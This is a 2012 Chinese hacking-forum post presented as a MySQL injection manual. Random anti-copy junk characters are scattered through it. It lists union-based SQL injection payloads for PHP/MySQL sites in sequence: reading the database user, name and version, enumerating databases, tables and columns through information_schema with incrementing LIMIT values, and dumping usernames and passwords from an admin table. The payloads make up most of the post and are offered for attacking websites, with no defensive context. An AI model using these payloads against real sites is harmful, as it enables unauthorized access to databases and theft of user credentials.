找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2125|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

2 h: U  V& D; D8 f7 f6 j. B# d教程内容:Mysql 5+php 注入+ q8 _1 e- b& e" i! k& x

; I6 \) c4 Z7 A6 S5 D  a
; f) V6 K+ g0 }4 K6 [0 n4 P8 c9 |& S% x7 j
一.查看MYSQL基本信息(库名,版本,用户)
/ l. A" J1 s4 @2 `* A
+ o4 v0 |! }$ G* ]& `and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*! }) ~) ]. E7 D: r' w( d
6 i' A$ h' W' h; S# k# t
二.查数据库2 Y" Y! {4 H, i* X5 ~8 D% y/ K& `* u
8 C& h) z- `8 j
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
  F4 ]( T( A( L$ M4 O7 Rlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
1 t7 i4 V- [! W3 V# g+ q& [) c6 B5 M, Q
三.暴表
9 t" A4 V# j. d
' F* |' ]0 U" v6 P9 ?% Uand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*" O: @. k1 D3 B) T' [: E+ {# O
2 L# t% [" _: F, y6 [. t% o2 t. S1 A
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。) l" C0 g& e9 U3 l: I- z" @
  q! o0 {: c  ^0 d
四.暴字段
5 a+ J5 ]$ O+ \$ @1 p' C" q, M/ w5 h5 E+ }% S5 z
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*2 V# ^+ L# f8 N9 Z
, Y. u7 T, }1 }- H8 E; r/ \! v
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
/ A9 n; `* f9 ^
: t' T3 B6 @$ T5 D9 z- N( c; u% |+ F五.暴数据% Z7 E2 B; j- A4 |& Z
! O0 F8 a% W+ X, S6 i
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/** s- Z6 @, F8 ]) B3 }. G0 ~3 _

" j* I. `; @+ d! l1 [) ]$ {
5 f( \  C6 U" k5 R* G" Y7 R' g' g0 {% L这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
9 b& R  z6 u- T, B: m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表